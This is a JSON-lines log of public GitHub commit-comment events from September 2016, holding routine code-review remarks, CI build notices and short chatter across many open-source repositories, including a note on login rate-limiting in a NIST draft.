{"id":"4581997254","type":"CommitCommentEvent","actor":{"login":"ITE03050396"},"repo":{"name":"ITE03050396/Lab03"},"payload":{"comment":{"id":19075222,"position":null,"line":null,"path":null,"commit_id":"f7ce30845a900440a7cfa3cd7d02a0dd64d60c27","created_at":"2016-09-19T08:36:28Z","updated_at":"2016-09-19T08:36:28Z","body":"Updata -> Update."}},"created_at":"2016-09-19T08:36:28Z"}
{"id":"4581998732","type":"CommitCommentEvent","actor":{"login":"LokiSharp"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075226,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T08:36:49Z","updated_at":"2016-09-19T08:36:49Z","body":"What happened？And what can I do？"}},"created_at":"2016-09-19T08:36:49Z"}
{"id":"4582000758","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19075232,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T08:37:19Z","updated_at":"2016-09-19T08:37:19Z","body":"2333333"}},"created_at":"2016-09-19T08:37:19Z"}
{"id":"4582003030","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075237,"position":10,"line":10,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:37:52Z","updated_at":"2016-09-19T08:37:52Z","body":"Code style: Use double underscores for private fields."}},"created_at":"2016-09-19T08:37:52Z"}
{"id":"4582003857","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075241,"position":13,"line":13,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:38:06Z","updated_at":"2016-09-19T08:38:06Z","body":"Code style: Use double underscores for private fields."}},"created_at":"2016-09-19T08:38:06Z"}
{"id":"4582007471","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19075244,"position":5,"line":739,"path":"CodeSniffer/CLI.php","commit_id":"4506689a25860bff1a262a81e2d873971adc77fc","created_at":"2016-09-19T08:39:01Z","updated_at":"2016-09-19T08:39:01Z","body":"If the path starts with a drive letter, it's going to return false from realpath because the path would be something like `c:/path/to/somewhere/c:/path/to/somewhere/else`. For windows, it pretty much always fals through to line 748 below."}},"created_at":"2016-09-19T08:39:01Z"}
{"id":"4582007877","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075247,"position":1,"line":1,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:39:08Z","updated_at":"2016-09-19T08:39:08Z","body":"The copyright notice and license terms are missing from this file."}},"created_at":"2016-09-19T08:39:08Z"}
{"id":"4582013879","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075262,"position":null,"line":null,"path":null,"commit_id":"e4a4de3df417de6b9aeeb23bb7da0cf91e1cee85","created_at":"2016-09-19T08:40:35Z","updated_at":"2016-09-19T08:40:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1037](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13469&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:55"}},"created_at":"2016-09-19T08:40:35Z"}
{"id":"4582016045","type":"CommitCommentEvent","actor":{"login":"FloEdelmann"},"repo":{"name":"FloEdelmann/fixture-converter"},"payload":{"comment":{"id":19075271,"position":164,"line":342,"path":"formats/ecue.js","commit_id":"ade1bf869d458c2281462dcdd70aeb93df69a2b6","created_at":"2016-09-19T08:41:06Z","updated_at":"2016-09-19T08:41:06Z","body":"Commented out because of #15 "}},"created_at":"2016-09-19T08:41:06Z"}
{"id":"4582017118","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075275,"position":36,"line":36,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:41:20Z","updated_at":"2016-09-19T08:41:20Z","body":"Should this also trigger if the property `\"resolve\"` changes?"}},"created_at":"2016-09-19T08:41:20Z"}
{"id":"4582019270","type":"CommitCommentEvent","actor":{"login":"GerdMiko"},"repo":{"name":"GPesch/APS2016-ParticleAnalysis"},"payload":{"comment":{"id":19075281,"position":null,"line":null,"path":null,"commit_id":"7c8e98d9357f0c28fb8e42b5d804844aafa8cc4d","created_at":"2016-09-19T08:41:51Z","updated_at":"2016-09-19T08:41:51Z","body":"Dieser Commit ist sinnlos. Dreht die Änderungen des vorigen Commits wieder um. War ein Versehen. Kanns nicht löschen..."}},"created_at":"2016-09-19T08:41:51Z"}
{"id":"4582020905","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19075285,"position":null,"line":null,"path":null,"commit_id":"11aeceeab9dcf934a551bf6890dec2a89570766c","created_at":"2016-09-19T08:42:15Z","updated_at":"2016-09-19T08:42:15Z","body":"@NSkelsey: this fixes the following error.\r\n\r\nhttps://stackoverflow.com/questions/29928856/protractor-failed-stale-element-reference-element-is-not-attached-to-the-pag\r\n\r\nbasically when we perform wait activities in a loop is better to pass the locator and get a fresh element.\r\n\r\nthis was causing a race condition when getting an element while the refresh was not happened, and then reusing that element in the wait loop."}},"created_at":"2016-09-19T08:42:15Z"}
{"id":"4582025093","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19075293,"position":14,"line":26,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T08:43:16Z","updated_at":"2016-09-19T08:43:16Z","body":"Es müsste gespeichert werden, welches Team \"Heimmannschaft\" ist, damit die Spielpläne sich nicht durch Zufall ändern."}},"created_at":"2016-09-19T08:43:16Z"}
{"id":"4582027790","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19075298,"position":null,"line":null,"path":null,"commit_id":"066447c24f4339ab37566a1cbbde2a390f16a94e","created_at":"2016-09-19T08:43:53Z","updated_at":"2016-09-19T08:43:53Z","body":"Congrats!"}},"created_at":"2016-09-19T08:43:53Z"}
{"id":"4582027855","type":"CommitCommentEvent","actor":{"login":"colm2"},"repo":{"name":"UCCNetworkingSociety/lowdown"},"payload":{"comment":{"id":19075300,"position":null,"line":null,"path":null,"commit_id":"1fd3048bf2e350fce46401330713ca9128a37cb9","created_at":"2016-09-19T08:43:54Z","updated_at":"2016-09-19T08:43:54Z","body":"\\*ahem*\r\n\r\nTurns out testing in prod was less-than-ideal. Going to work on this again later today."}},"created_at":"2016-09-19T08:43:54Z"}
{"id":"4582028281","type":"CommitCommentEvent","actor":{"login":"rocio-va"},"repo":{"name":"slindberf/codebros"},"payload":{"comment":{"id":19075302,"position":5,"line":13,"path":"app/views/layouts/application.html.erb","commit_id":"c508b79f9440cde112611e3e5fb8b5444e169b1c","created_at":"2016-09-19T08:43:59Z","updated_at":"2016-09-19T08:43:59Z","body":"Ya claro... XD"}},"created_at":"2016-09-19T08:43:59Z"}
{"id":"4582032827","type":"CommitCommentEvent","actor":{"login":"ERaBala"},"repo":{"name":"ERaBala/Stayboat"},"payload":{"comment":{"id":19075314,"position":null,"line":null,"path":null,"commit_id":"ccc0b2aab9a73ccbe24c43e81f0cae1693a818c8","created_at":"2016-09-19T08:45:06Z","updated_at":"2016-09-19T08:45:06Z","body":"Adding Calendar Controller ZBJCalendar Test"}},"created_at":"2016-09-19T08:45:06Z"}
{"id":"4582033660","type":"CommitCommentEvent","actor":{"login":"shitala-cuelogic"},"repo":{"name":"tusharncuelogic/Training-Angular"},"payload":{"comment":{"id":19075316,"position":2,"line":2,"path":"api/routes.js","commit_id":"65535f41886c7fc1e469d74b6c2a4a6f672f6c7c","created_at":"2016-09-19T08:45:18Z","updated_at":"2016-09-19T08:45:18Z","body":"@tusharncuelogic Can you explain what's happening in this code? "}},"created_at":"2016-09-19T08:45:18Z"}
{"id":"4582033771","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19075317,"position":5,"line":86,"path":"components/style/core/base.less","commit_id":"9042e139b3298a5f807f7d3dd388ffe356cb3caf","created_at":"2016-09-19T08:45:20Z","updated_at":"2016-09-19T08:45:20Z","body":"那这个先保留吧，其他应该都没用。"}},"created_at":"2016-09-19T08:45:20Z"}
{"id":"4582036891","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19075327,"position":19,"line":31,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T08:46:02Z","updated_at":"2016-09-19T08:46:02Z","body":"Ich finde man könnte sprechendere Schlüssel verwenden. "}},"created_at":"2016-09-19T08:46:02Z"}
{"id":"4582037342","type":"CommitCommentEvent","actor":{"login":"haobingwang"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075329,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T08:46:10Z","updated_at":"2016-09-19T08:46:10Z","body":"Wish everthing is ok."}},"created_at":"2016-09-19T08:46:10Z"}
{"id":"4582037559","type":"CommitCommentEvent","actor":{"login":"nkyle01"},"repo":{"name":"usnistgov/800-63-3"},"payload":{"comment":{"id":19075330,"position":5,"line":19,"path":"sp800-63b/appA_memorized.md","commit_id":"0e95b723581bc4a02ca13fd19a84982d9f75ec8f","created_at":"2016-09-19T08:46:13Z","updated_at":"2016-09-19T08:46:13Z","body":"This modified version sounds much better. Rate-limiting mechanisms (to prevent online password guessing) presented in Section 5.2.2 of 63B are effective, yet I have a minor note. \r\n\r\nCurrently, the failed-login counter is set to 100 in a period of 30 days. According to the previous mentioned ACM CCS'16 paper (http://bit.ly/2ck516a), an online attacker, who is with the knowledge of some readily available personal information about the victim, can achieve about 20% success rates against normal users with just 100 guesses, 25% with 1000 guesses, and 50% with 1000,000 guesses. As we have to prevent denial of service attack and online guessing attack at the same time, setting 100 as the threshold of the failed-login counter is acceptable. In this case, it is worth noting that the failed-login counter shall NOT be reset to 0 when a successful login occurs. Otherwise, the attacker may gain an overwhelming success rate (e.g., with 1000 guesses) by interleaving her failed guesses with the victim's successful logins. \r\n\r\nIn a nutshell, the paragraph in Section 5.2.2 of 63B\r\n\r\n\"When the authenticator output or activation secret does not have sufficient entropy, the verifier SHALL implement controls to protect against online guessing attacks. Unless otherwise specified in the description of a given authenticator, the verifier SHALL effectively limit online attackers to 100 consecutive failed attempts on a single account in any 30 day period. \"\r\n\r\nmay be revised as:\r\n\r\nWhen the authenticator output or activation secret does not have sufficient entropy, the verifier SHALL implement controls to protect against online guessing attacks. Unless otherwise specified in the description of a given authenticator, the verifier SHALL effectively limit online attackers to 100 consecutive failed attempts on a single account in any 30 day period.  **The failed-login counter shall NOT be reset to 0 when a successful login occurs.**"}},"created_at":"2016-09-19T08:46:13Z"}
{"id":"4582038152","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19075332,"position":null,"line":null,"path":null,"commit_id":"abf3e9ca31dc225586e171431d5a0d804fb660dc","created_at":"2016-09-19T08:46:21Z","updated_at":"2016-09-19T08:46:21Z","body":"@ajithcj exactly!\r\n\r\n@ElbertoOne combo patches are accepted only for parameter tuning. Please drop the test.\r\n"}},"created_at":"2016-09-19T08:46:21Z"}
{"id":"4582039961","type":"CommitCommentEvent","actor":{"login":"cui-wei"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075336,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T08:46:47Z","updated_at":"2016-09-19T08:46:47Z","body":"where is it ????"}},"created_at":"2016-09-19T08:46:47Z"}
{"id":"4582040827","type":"CommitCommentEvent","actor":{"login":"oleksiyk"},"repo":{"name":"oleksiyk/kafka"},"payload":{"comment":{"id":19075340,"position":76,"line":185,"path":"lib/connection.js","commit_id":"7dabcf2bf7c361f2514bb70d42d7c9f97ef67a2f","created_at":"2016-09-19T08:46:59Z","updated_at":"2016-09-19T08:46:59Z","body":"@Mattenable Can you give me some more information? Or can you add some debug output near (above) that line to test if `correlationId` property exists in `this.queue` and output the wrong one?"}},"created_at":"2016-09-19T08:46:59Z"}
{"id":"4582045637","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075351,"position":53,"line":53,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:48:06Z","updated_at":"2016-09-19T08:48:06Z","body":"I know this changed around a bit in newer code, but it still holds: Why are you first gathering all containers and then iterating over them? Why not directly iterate over `stack.getContainers()` inside the while loop?"}},"created_at":"2016-09-19T08:48:06Z"}
{"id":"4582045695","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19075353,"position":11,"line":23,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T08:48:07Z","updated_at":"2016-09-19T08:48:07Z","body":"Wenn man noch einen Zeitstempel einführt, kann man livescoring machen. Wenn man später eventuell noch angeben möchte, welches Spieler Assist oder Score gemacht hat, müssten die Felder hier vielleicht auch noch rein. Endstand ist dann die GameScore mit dem letzten Zeitstempel."}},"created_at":"2016-09-19T08:48:07Z"}
{"id":"4582047953","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075358,"position":null,"line":null,"path":null,"commit_id":"f37b79fea4a05cf4a411e7bd5b87e3112ade3242","created_at":"2016-09-19T08:48:37Z","updated_at":"2016-09-19T08:48:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1038](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13473&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T08:48:37Z"}
{"id":"4582064442","type":"CommitCommentEvent","actor":{"login":"kuzkok"},"repo":{"name":"Flexberry/ember-flexberry-gis"},"payload":{"comment":{"id":19075392,"position":2,"line":2,"path":"addon/components/base-control.js","commit_id":"301ce7ad298f29982321e11283dbd452228b4878","created_at":"2016-09-19T08:52:32Z","updated_at":"2016-09-19T08:52:32Z","body":"why you remove spaces in documentation comments\r\nall our code was that\r\n```javascript\r\n/**\r\n  documentation description\r\n */\r\n```\r\nafter your changes\r\n```javascript\r\n/**\r\ndocumentation description\r\n*/\r\n```\r\n"}},"created_at":"2016-09-19T08:52:32Z"}
{"id":"4582067859","type":"CommitCommentEvent","actor":{"login":"vext01"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":19075402,"position":119,"line":407,"path":"libkrun/libkruntime.c","commit_id":"a59c97edda3e1d7f4fdbc9f6e504d54af7cd35e1","created_at":"2016-09-19T08:53:22Z","updated_at":"2016-09-19T08:53:22Z","body":"I don't know which is more likely to overflow -- it depends upon not just how many bits are available, but also upon the speed at which the counters increment.\r\n\r\nLooking back at this comment, it's an interesting thought experiment, but not a good comment. We check for overflow, and that is good enough. Let's kill this comment?"}},"created_at":"2016-09-19T08:53:22Z"}
{"id":"4582070303","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":19075409,"position":119,"line":407,"path":"libkrun/libkruntime.c","commit_id":"a59c97edda3e1d7f4fdbc9f6e504d54af7cd35e1","created_at":"2016-09-19T08:53:56Z","updated_at":"2016-09-19T08:53:56Z","body":"Fair enough, let's kill it."}},"created_at":"2016-09-19T08:53:56Z"}
{"id":"4582071607","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"IEEECS-VIT/GPL"},"payload":{"comment":{"id":19075414,"position":null,"line":null,"path":null,"commit_id":"fb3485593e5a61942843145a9cea0db9d7738c5f","created_at":"2016-09-19T08:54:14Z","updated_at":"2016-09-19T08:54:14Z","body":"@saurabhmathur96 Okay, this can be fixe by altering the minification options in https://github.com/IEEECS-VIT/GPL/blob/master/utils/misc/pack.js#L33"}},"created_at":"2016-09-19T08:54:14Z"}
{"id":"4582071911","type":"CommitCommentEvent","actor":{"login":"jvandemo"},"repo":{"name":"jvandemo/angular-contentful"},"payload":{"comment":{"id":19075415,"position":12,"line":35,"path":"README.md","commit_id":"b28c02e306a3c11aeb71d2a948fd1948307d0a61","created_at":"2016-09-19T08:54:18Z","updated_at":"2016-09-19T08:54:18Z","body":"@ibrahimtaguri &mdash; I have added a comment that the path may vary depending on installation method. Thank you for your feedback!"}},"created_at":"2016-09-19T08:54:18Z"}
{"id":"4582072156","type":"CommitCommentEvent","actor":{"login":"meeeA"},"repo":{"name":"cloudliner/team_quick"},"payload":{"comment":{"id":19075417,"position":null,"line":null,"path":null,"commit_id":"5be5791f75fc2650e94af21a31765941b02d25f0","created_at":"2016-09-19T08:54:21Z","updated_at":"2016-09-19T08:54:21Z","body":"OKです。"}},"created_at":"2016-09-19T08:54:21Z"}
{"id":"4582073662","type":"CommitCommentEvent","actor":{"login":"ilteroi"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19075423,"position":null,"line":null,"path":null,"commit_id":"02cb2d050c2edfc46aa0507d46c1b30763467e25","created_at":"2016-09-19T08:54:43Z","updated_at":"2016-09-19T08:54:43Z","body":"if you ask me, you've got a bunch of merge errors there ...\r\n\r\n```\r\n+#if defined(MOD_ACTIVE_DIPLOMACY)\r\n -\tif(isHotSeat())\t\t +<<<<<<< HEAD\r\n +\tif(!GC.getGame().isReallyNetworkMultiPlayer() || !MOD_ACTIVE_DIPLOMACY)\r\n +=======\r\n +\tif(!GC.getGame().isReallyNetworkMultiPlayer() && MOD_ACTIVE_DIPLOMACY)\r\n +>>>>>>> origin/master\r\n```"}},"created_at":"2016-09-19T08:54:43Z"}
{"id":"4582078878","type":"CommitCommentEvent","actor":{"login":"Minseop1"},"repo":{"name":"Minseop1/Hurabono"},"payload":{"comment":{"id":19075437,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-19T08:55:56Z","updated_at":"2016-09-19T08:55:56Z","body":"안녕하세요"}},"created_at":"2016-09-19T08:55:56Z"}
{"id":"4582093392","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":19075469,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-19T08:59:16Z","updated_at":"2016-09-19T08:59:16Z","body":"It is not the same (2nd monitor). I still think that OBS overlay (not recorded and recorded) is a good option. With it enabled you can see what is active right now (how it doing, and so on) and not turn your head to the second monitor to just check the things.\r\n\r\nFor example, you are selecting the window and you still don't know is the scene auto-switched or not (you need to look at the second monitor at OBS preview). Red outline of the window can can point you to the place what area is captured right now (you may use your own marks, it is just example).\r\n\r\nPlugin is optional, so I don't mind."}},"created_at":"2016-09-19T08:59:16Z"}
{"id":"4582093739","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075470,"position":null,"line":null,"path":null,"commit_id":"f37b79fea4a05cf4a411e7bd5b87e3112ade3242","created_at":"2016-09-19T08:59:21Z","updated_at":"2016-09-19T08:59:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1038](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13473&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:10:44"}},"created_at":"2016-09-19T08:59:21Z"}
{"id":"4582098113","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19075484,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-19T09:00:23Z","updated_at":"2016-09-19T09:00:23Z","body":"![Szeptember 19. - Hétfő](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1474206763)\nBrokkoli krémleves\r\nBakonyi csirkemell jázminrizzsel\r\nMascarponés-kávés pohárkrém"}},"created_at":"2016-09-19T09:00:23Z"}
{"id":"4582099487","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19075487,"position":30,"line":50,"path":"plugins/importexport/native/locale/en_US/locale.xml","commit_id":"92823b17655eb48aa076c65072e132e993d73f39","created_at":"2016-09-19T09:00:39Z","updated_at":"2016-09-19T09:00:39Z","body":"@asmecher, I worked on other CLI and fixed those here: s. https://github.com/pkp/ojs/pull/1016"}},"created_at":"2016-09-19T09:00:39Z"}
{"id":"4582103037","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075499,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T09:01:25Z","updated_at":"2016-09-19T09:01:25Z","body":"@lots0logs This breaks our launchpad build. Launchpad doesn't allow to hold git directory."}},"created_at":"2016-09-19T09:01:25Z"}
{"id":"4582104744","type":"CommitCommentEvent","actor":{"login":"CalmArms"},"repo":{"name":"hackpompey/website"},"payload":{"comment":{"id":19075505,"position":null,"line":null,"path":null,"commit_id":"a1b942b1be3f6b53093e4e2d988f8a7f6a66463d","created_at":"2016-09-19T09:01:48Z","updated_at":"2016-09-19T09:01:48Z","body":"Add:\r\n\r\n.hack--current .countdown {\r\n    ...\r\n    min-width: 195px;\r\n    ...\r\n}"}},"created_at":"2016-09-19T09:01:48Z"}
{"id":"4582108355","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075515,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T09:02:39Z","updated_at":"2016-09-19T09:02:39Z","body":"Maybe disable it in Travis? I think it has an environment variable?"}},"created_at":"2016-09-19T09:02:39Z"}
{"id":"4582110948","type":"CommitCommentEvent","actor":{"login":"leeight"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19075523,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-19T09:03:01Z","updated_at":"2016-09-19T09:03:01Z","body":"Why drop the quotes?"}},"created_at":"2016-09-19T09:03:01Z"}
{"id":"4582112426","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075527,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T09:03:24Z","updated_at":"2016-09-19T09:03:24Z","body":"@lots0logs This again breaks our build at launchpad. debian/rules needs to be updated."}},"created_at":"2016-09-19T09:03:24Z"}
{"id":"4582113227","type":"CommitCommentEvent","actor":{"login":"matzew"},"repo":{"name":"matzew/aerogear-unifiedpush-server"},"payload":{"comment":{"id":19075531,"position":24,"line":103,"path":"model/jpa/src/main/java/org/jboss/aerogear/unifiedpush/jpa/dao/impl/JPAPushMessageInformationDao.java","commit_id":"4201fb30f9d58d49cb66f18c897b4353fa751719","created_at":"2016-09-19T09:03:35Z","updated_at":"2016-09-19T09:03:35Z","body":"@gunnarmorling perhaps something like this could be done.... but not sure if executing two queries is better.\r\n\r\nUnfortunately the unit tests are running (by default) on Derby - not MySQL "}},"created_at":"2016-09-19T09:03:35Z"}
{"id":"4582113882","type":"CommitCommentEvent","actor":{"login":"deepacorn97"},"repo":{"name":"deepacorn97/imad-2016-app"},"payload":{"comment":{"id":19075533,"position":4,"line":12,"path":"ui/index.html","commit_id":"19c9b4ce1bae5d16d64444cbf1d070316d968a9e","created_at":"2016-09-19T09:03:45Z","updated_at":"2016-09-19T09:03:45Z","body":"welcome\r\n"}},"created_at":"2016-09-19T09:03:45Z"}
{"id":"4582114963","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19075534,"position":null,"line":null,"path":null,"commit_id":"7b5b91d8697360dcf49284a00e1111acf54b00f6","created_at":"2016-09-19T09:04:00Z","updated_at":"2016-09-19T09:04:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#CrmHnCjHRkuVypRzAazmIA"}},"created_at":"2016-09-19T09:04:00Z"}
{"id":"4582117259","type":"CommitCommentEvent","actor":{"login":"mengyyy"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075541,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:04:22Z","updated_at":"2016-09-19T09:04:22Z","body":"winter is coming"}},"created_at":"2016-09-19T09:04:22Z"}
{"id":"4582122178","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19075556,"position":null,"line":null,"path":null,"commit_id":"abf3e9ca31dc225586e171431d5a0d804fb660dc","created_at":"2016-09-19T09:05:23Z","updated_at":"2016-09-19T09:05:23Z","body":"Ok, will do."}},"created_at":"2016-09-19T09:05:23Z"}
{"id":"4582123303","type":"CommitCommentEvent","actor":{"login":"ametake"},"repo":{"name":"shadowsocks/shadowsocks"},"payload":{"comment":{"id":19075559,"position":null,"line":null,"path":null,"commit_id":"938bba32a4008bdde9c064dda6a0597987ddef54","created_at":"2016-09-19T09:05:38Z","updated_at":"2016-09-19T09:05:38Z","body":"Thank you."}},"created_at":"2016-09-19T09:05:38Z"}
{"id":"4582123411","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075560,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T09:05:40Z","updated_at":"2016-09-19T09:05:40Z","body":"@satya164 LATEST_STABLE_RELEASE will generate error when processing makefile as it doesn't know any git command"}},"created_at":"2016-09-19T09:05:40Z"}
{"id":"4582123928","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"sonyxperiadev/kernel"},"payload":{"comment":{"id":19075563,"position":null,"line":null,"path":null,"commit_id":"beefc265c1c11b87529fac01a67b68c288b95894","created_at":"2016-09-19T09:05:48Z","updated_at":"2016-09-19T09:05:48Z","body":"Hello Angelo,\r\n\r\nAny chance of adding the DSDS (Dual SIM) variant as it was done for Kitakami?\r\n\r\n\r\nKind regards.\r\nPablo"}},"created_at":"2016-09-19T09:05:48Z"}
{"id":"4582126264","type":"CommitCommentEvent","actor":{"login":"ebfe"},"repo":{"name":"chneukirchen/xtools"},"payload":{"comment":{"id":19075567,"position":13,"line":17,"path":"xbulk","commit_id":"1123239d055cfe09d7da926baa385d2d1838305f","created_at":"2016-09-19T09:06:23Z","updated_at":"2016-09-19T09:06:23Z","body":"Why make this distinction. At least `-o` should also be passed to `show-build-deps`."}},"created_at":"2016-09-19T09:06:23Z"}
{"id":"4582126944","type":"CommitCommentEvent","actor":{"login":"10alswhd"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19075572,"position":38,"line":38,"path":"gistfile1.txt","commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-19T09:06:33Z","updated_at":"2016-09-19T09:06:33Z","body":"입력값 m,n을 compute_sum 함수를 이용하여 구한 뒤 sum값에 대입합니다."}},"created_at":"2016-09-19T09:06:33Z"}
{"id":"4582127491","type":"CommitCommentEvent","actor":{"login":"DIYgod"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075577,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:06:42Z","updated_at":"2016-09-19T09:06:42Z","body":"Backup only: https://github.com/Long-live-gfwlist"}},"created_at":"2016-09-19T09:06:42Z"}
